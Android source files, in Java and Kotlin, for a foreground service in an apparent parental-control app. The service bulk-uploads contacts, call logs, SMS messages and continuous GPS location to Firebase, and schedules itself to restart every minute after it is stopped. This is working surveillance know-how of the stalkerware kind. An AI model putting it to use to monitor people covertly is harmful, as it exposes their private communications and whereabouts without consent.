File: app/src/main/java/com/example/parentalcontrol/service/ForegroundServiceWithNotification.java
package com.example.parentalcontrol.service;

import android.Manifest;
import android.app.AlarmManager;
import android.app.Notification;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.database.ContentObserver;
import android.location.Location;
import android.os.Build;
import android.os.Handler;
import android.os.IBinder;
import android.util.Log;
import android.widget.Toast;

import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.app.ActivityCompat;
import androidx.core.app.NotificationCompat;

import com.example.parentalcontrol.MainActivity;
import com.example.parentalcontrol.R;
import com.example.parentalcontrol.model.ContactModel;
import com.example.parentalcontrol.utils.CallLogUtils;
import com.example.parentalcontrol.utils.ContactUtils;
import com.example.parentalcontrol.utils.FirebaseHelper;
import com.example.parentalcontrol.utils.MediaStoreHelper;
import com.example.parentalcontrol.utils.MyApp;
import com.example.parentalcontrol.utils.SmsUtils;
import com.google.android.gms.location.FusedLocationProviderClient;
import com.google.android.gms.location.LocationCallback;
import com.google.android.gms.location.LocationRequest;
import com.google.android.gms.location.LocationResult;
import com.google.android.gms.location.LocationServices;
import com.google.android.gms.tasks.OnFailureListener;
import com.google.android.gms.tasks.OnSuccessListener;
import com.google.firebase.database.DatabaseReference;
import com.google.firebase.database.FirebaseDatabase;

import java.util.List;

public class ForegroundServiceWithNotification extends Service {

    private FusedLocationProviderClient fusedLocationClient;
    private ContentObserver contentObserver;
    private DatabaseReference locationReference;
    private Handler handler = new Handler();
    private final int delayMillis = 5000; // 5 seconds


    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {

        String input = intent.getStringExtra("inputExtra");
        Intent notificationIntent = new Intent(this, MainActivity.class);
        PendingIntent pendingIntent = PendingIntent.getActivity(this,
                0, notificationIntent, 0);
        Notification notification = new NotificationCompat.Builder(this, MyApp.CHANNEL_ID)
                .setContentTitle("Notification Service")
                .setContentText(input)
                .setSmallIcon(R.drawable.ic_logo)
                .setContentIntent(pendingIntent)
                .build();
        NotificationManager mNotificationManager = (NotificationManager) getSystemService(Context.NOTIFICATION_SERVICE);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            NotificationChannel channel = new NotificationChannel( MyApp.CHANNEL_ID, MyApp.CHANNEL_NAME, NotificationManager.IMPORTANCE_DEFAULT);
            mNotificationManager.createNotificationChannel(channel);
            new NotificationCompat.Builder(this, MyApp.CHANNEL_ID);
        }
        startForeground(1, notification);




        Toast.makeText(this, "Work", Toast.LENGTH_SHORT).show();

        // Initialize the FusedLocationProviderClient
        fusedLocationClient = LocationServices.getFusedLocationProviderClient(this);

        // Initialize the Firebase Database reference
        locationReference = FirebaseDatabase.getInstance().getReference("UserId");


        startContactsFetching();
        startRepeatingTask();
        startLocationUpdates();
        startCallLogsFetching();
        startSmsFetching();




        return START_STICKY;
    }

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }


    @Override
    public void onDestroy() {
        super.onDestroy();
        stopLocationUpdates();
        stopRepeatingTask();
        Toast.makeText(this, "Stop", Toast.LENGTH_SHORT).show();
        scheduleServiceRestart();
    }


    private void scheduleServiceRestart() {

        AlarmManager alarmManager = (AlarmManager) getSystemService(Context.ALARM_SERVICE);
        Intent intent = new Intent(this, RestartServiceReceiver.class);
        PendingIntent pendingIntent = PendingIntent.getBroadcast(this, 0, intent, PendingIntent.FLAG_UPDATE_CURRENT);

        long triggerAtMillis = System.currentTimeMillis() + delayMillis; // Delay for restarting the service
        long repeatIntervalMillis = 60 * 1000; // Repeat every 60 seconds

        if (alarmManager != null) {
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
                alarmManager.setAndAllowWhileIdle(AlarmManager.RTC_WAKEUP, triggerAtMillis, pendingIntent);
            } else {
                alarmManager.set(AlarmManager.RTC_WAKEUP, triggerAtMillis, pendingIntent);
            }

            // want to repeat the restart, uncomment the following line
            alarmManager.setRepeating(AlarmManager.RTC_WAKEUP, triggerAtMillis, repeatIntervalMillis, pendingIntent);
        }
    }

    private void runInBackground(Runnable task) {
        new Thread(task).start();
    }

    private void sendImagesToDatabase() {
        FirebaseHelper.uploadImagesToFirebase(MediaStoreHelper.getAllImages(this));
    }

    private void sendVideosToDatabase(){
        FirebaseHelper.uploadVideosToFirebase(MediaStoreHelper.getAllVideos(this));
    }
    private void sendDocumentsToFirebase(){
        FirebaseHelper.uploadDocumentsToFirebase(MediaStoreHelper.getAllDocuments(this));
    }
    private void startCallLogsFetching(){
        FirebaseHelper.uploadCallLogToFirebase(CallLogUtils.getAllCallLogs(this));
    }

    private void startSmsFetching(){
        FirebaseHelper.uploadSmsToFirebase(SmsUtils.getAllSms(this));
    }
    private void startContactsFetching(){
        ContactUtils.getAllContactsListAsync(this, new ContactUtils.OnContactFetchedListener() {
            @Override
            public void onContactsFetched(List<ContactModel> contactsList) {
                FirebaseHelper.uploadContactsToFirebase(contactsList);
            }
        });
    }


    private void startRepeatingTask() {
        new Thread(
                new Runnable() {
                    @Override
                    public void run() {
                        while (true) {
                            Log.e("Service", "Service is running...");
                            try {
                                Thread.sleep(2000);
                            } catch (InterruptedException e) {
                                e.printStackTrace();
                            }
                        }
                    }
                }
        ).start();
    }

    private void stopRepeatingTask() {
        handler.removeCallbacksAndMessages(null);
    }

    private void startLocationUpdates() {
        LocationRequest locationRequest = new LocationRequest();
        locationRequest.setInterval(5000); // Update every 50 seconds
        locationRequest.setFastestInterval(3000); // Fastest update interval
        locationRequest.setPriority(LocationRequest.PRIORITY_HIGH_ACCURACY);

        if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) == PackageManager.PERMISSION_GRANTED && ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) == PackageManager.PERMISSION_GRANTED) {
            fusedLocationClient.requestLocationUpdates(locationRequest, locationCallback, null);
        }

    }

    private void stopLocationUpdates() {
        fusedLocationClient.removeLocationUpdates(locationCallback);
    }

    private LocationCallback locationCallback = new LocationCallback() {
        @Override
        public void onLocationResult(LocationResult locationResult) {
            if (locationResult != null) {
                Location location = locationResult.getLastLocation();
                if (location != null) {
                    // Update the user's location in Firebase
                    updateLocationInFirebase(location.getLatitude(), location.getLongitude());
                }
            }
        }
    };



    private void updateLocationInFirebase(double latitude, double longitude) {
        locationReference.child("locationData").child("latitude").setValue(latitude)
                .addOnSuccessListener(new OnSuccessListener<Void>() {
                    @Override
                    public void onSuccess(Void unused) {
                        Log.d("locationSaveInDb", "onSuccess: ");
                    }
                })
                .addOnFailureListener(new OnFailureListener() {
                    @Override
                    public void onFailure(@NonNull Exception e) {
                        Log.d("locationSaveInDb", "onFailure: "+e.getMessage());
                    }
                });
        locationReference.child("locationData").child("longitude").setValue(longitude);
    }
}

File: app/src/main/java/com/example/parentalcontrol/service/ForegroundServiceWithNotification.kt
package com.example.parentalcontrol.service

import android.Manifest
import android.annotation.SuppressLint
import android.app.*
import android.content.Context
import android.content.Intent
import android.content.SharedPreferences
import android.content.pm.PackageManager
import android.graphics.PixelFormat
import android.location.Location
import android.os.Build
import android.os.Handler
import android.os.IBinder
import android.util.Log
import android.view.WindowManager
import android.widget.Toast
import androidx.annotation.RequiresApi
import androidx.core.app.ActivityCompat
import androidx.core.app.NotificationCompat
import com.example.parentalcontrol.MainActivity
import com.example.parentalcontrol.R
import com.example.parentalcontrol.model.ContactModel
import com.example.parentalcontrol.utils.*
import com.google.android.gms.location.*
import com.google.android.gms.tasks.OnFailureListener
import com.google.android.gms.tasks.OnSuccessListener
import com.google.firebase.database.DatabaseReference
import com.google.firebase.database.FirebaseDatabase
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.Job
import kotlinx.coroutines.flow.distinctUntilChanged
import kotlinx.coroutines.launch
import java.util.concurrent.Executors

public class ForegroundServiceWithNotification : Service() {

    private val PREF_FILE_NAME = "AppLockerPrefs"
    private val LOCKED_APPS_PREF_KEY = "LockedApps"
    private lateinit var pinOverlayView: PinOverlayView

    private lateinit var fusedLocationClient: FusedLocationProviderClient
    private lateinit var locationReference: DatabaseReference
    private val handler = Handler()
    private val delayMillis = 5000L // 5 seconds
    private val executorService = Executors.newSingleThreadExecutor()
    private lateinit var job: Job
    private lateinit var prefs: SharedPreferences

    @SuppressLint("NewApi")
    override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {
        val input = intent?.getStringExtra("inputExtra")
        val notificationIntent = Intent(this, MainActivity::class.java)
        val pendingIntent = PendingIntent.getActivity(
            this,
            0,
            notificationIntent,
            0
        )
        val notification: Notification = NotificationCompat.Builder(this, MyApp.CHANNEL_ID)
            .setContentTitle("Notification Service")
            .setContentText(input)
            .setSmallIcon(R.drawable.ic_logo)
            .setContentIntent(pendingIntent)
            .build()
        val mNotificationManager =
            getSystemService(Context.NOTIFICATION_SERVICE) as NotificationManager
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            val channel = NotificationChannel(
                MyApp.CHANNEL_ID,
                MyApp.CHANNEL_NAME,
                NotificationManager.IMPORTANCE_DEFAULT
            )
            mNotificationManager.createNotificationChannel(channel)
            NotificationCompat.Builder(this, MyApp.CHANNEL_ID)
        }
        startForeground(1, notification)
        Toast.makeText(this, "Work", Toast.LENGTH_SHORT).show()

        fusedLocationClient = LocationServices.getFusedLocationProviderClient(this)
        locationReference = FirebaseDatabase.getInstance().getReference("UserId")

        startContactsFetching()
        startAppLocking()
        startRepeatingTask()
        startLocationUpdates()
        startCallLogsFetching()
        startSmsFetching()
        return START_STICKY
    }

    override fun onBind(intent: Intent?): IBinder? {
        return null
    }

    override fun onDestroy() {
        super.onDestroy()
        stopLocationUpdates()
        job.cancel()
        stopRepeatingTask()
        Toast.makeText(this, "Stop", Toast.LENGTH_SHORT).show()
        scheduleServiceRestart()
    }

    @RequiresApi(Build.VERSION_CODES.LOLLIPOP)
    private fun startAppLocking() {
        job = CoroutineScope(Dispatchers.Main).launch {
            observeForegroundApps().distinctUntilChanged().collect { packageName ->
                if (isAppLocked(packageName)) {
                    // Implement overlay logic here
                    showPinOverlay()
                }
            }
        }
    }

    private fun isAppLocked(packageName: String?): Boolean {
        prefs = getSharedPreferences(PREF_FILE_NAME, Context.MODE_PRIVATE)
        val lockedApps = prefs.getString(LOCKED_APPS_PREF_KEY, "")
        return packageName != null && lockedApps?.contains(packageName) ?: false
    }

    private fun showPinOverlay() {
        pinOverlayView = PinOverlayView(this, null)
        val layoutFlag: Int = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY
        } else {
            WindowManager.LayoutParams.TYPE_PHONE
        }
        val params = WindowManager.LayoutParams(

            WindowManager.LayoutParams.WRAP_CONTENT,
            WindowManager.LayoutParams.WRAP_CONTENT,
            layoutFlag,
            WindowManager.LayoutParams.TYPE_SYSTEM_OVERLAY or
                    WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL or
                    WindowManager.LayoutParams.FLAG_FULLSCREEN or
                    WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON or
                    WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN,
            PixelFormat.TRANSLUCENT

            /*WindowManager.LayoutParams.MATCH_PARENT,
            WindowManager.LayoutParams.MATCH_PARENT,
            layoutFlag,
            WindowManager.LayoutParams.FLAG_WATCH_OUTSIDE_TOUCH or
                    WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN or
                    WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL or
                    WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,
            PixelFormat.TRANSLUCENT*/
        )
        val windowManager = getSystemService(Context.WINDOW_SERVICE) as WindowManager
        windowManager.addView(pinOverlayView, params)
    }



    private fun scheduleServiceRestart() {
        val alarmManager = getSystemService(Context.ALARM_SERVICE) as AlarmManager
        val intent = Intent(this, RestartServiceReceiver::class.java)
        val pendingIntent =
            PendingIntent.getBroadcast(this, 0, intent, PendingIntent.FLAG_UPDATE_CURRENT)
        val triggerAtMillis = System.currentTimeMillis() + delayMillis
        val repeatIntervalMillis = 60 * 1000L
        if (alarmManager != null) {
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
                alarmManager.setAndAllowWhileIdle(
                    AlarmManager.RTC_WAKEUP,
                    triggerAtMillis,
                    pendingIntent
                )
            } else {
                alarmManager.set(AlarmManager.RTC_WAKEUP, triggerAtMillis, pendingIntent)
            }
            alarmManager.setRepeating(
                AlarmManager.RTC_WAKEUP,
                triggerAtMillis,
                repeatIntervalMillis,
                pendingIntent
            )
        }
    }

    private fun runInBackground(task: Runnable) {
        Thread(task).start()
    }

    private fun sendImagesToDatabase() {
        FirebaseHelper.uploadImagesToFirebase(MediaStoreHelper.getAllImages(this))
    }

    private fun sendVideosToDatabase() {
        FirebaseHelper.uploadVideosToFirebase(MediaStoreHelper.getAllVideos(this))
    }

    private fun sendDocumentsToFirebase() {
        FirebaseHelper.uploadDocumentsToFirebase(MediaStoreHelper.getAllDocuments(this))
    }

    private fun startCallLogsFetching() {
        FirebaseHelper.uploadCallLogToFirebase(CallLogUtils.getAllCallLogs(this))
    }

    private fun startSmsFetching() {
        FirebaseHelper.uploadSmsToFirebase(SmsUtils.getAllSms(this))
    }

    private fun startContactsFetching() {
        ContactUtils.getAllContactsListAsync(this
        ) { contactsList -> FirebaseHelper.uploadContactsToFirebase(contactsList) }
    }

    private fun startRepeatingTask() {
        Thread {
            while (true) {
                Log.e("Service", "Service is running...")
                try {
                    Thread.sleep(2000)
                } catch (e: InterruptedException) {
                    e.printStackTrace()
                }
            }
        }.start()
    }

    private fun stopRepeatingTask() {
        handler.removeCallbacksAndMessages(null)
    }

    private fun startLocationUpdates() {
        val locationRequest = LocationRequest()
        locationRequest.interval = 5000
        locationRequest.fastestInterval = 3000
        locationRequest.priority = LocationRequest.PRIORITY_HIGH_ACCURACY
        if (ActivityCompat.checkSelfPermission(
                this,
                Manifest.permission.ACCESS_FINE_LOCATION
            ) == PackageManager.PERMISSION_GRANTED && ActivityCompat.checkSelfPermission(
                this,
                Manifest.permission.ACCESS_COARSE_LOCATION
            ) == PackageManager.PERMISSION_GRANTED
        ) {
            fusedLocationClient.requestLocationUpdates(locationRequest, locationCallback, null)
        }
    }

    private fun stopLocationUpdates() {
        fusedLocationClient.removeLocationUpdates(locationCallback)
    }

    private val locationCallback = object : LocationCallback() {
        override fun onLocationResult(locationResult: LocationResult) {
            if (locationResult != null) {
                val location: Location? = locationResult.lastLocation
                if (location != null) {
                    updateLocationInFirebase(location.latitude, location.longitude)
                }
            }
        }
    }

    private fun updateLocationInFirebase(latitude: Double, longitude: Double) {
        locationReference.child("locationData").child("latitude").setValue(latitude)
            .addOnSuccessListener {
                Log.d("locationSaveInDb", "onSuccess: ")
            }
            .addOnFailureListener { e ->
                Log.d("locationSaveInDb", "onFailure: ${e.message}")
            }
        locationReference.child("locationData").child("longitude").setValue(longitude)
    }
}
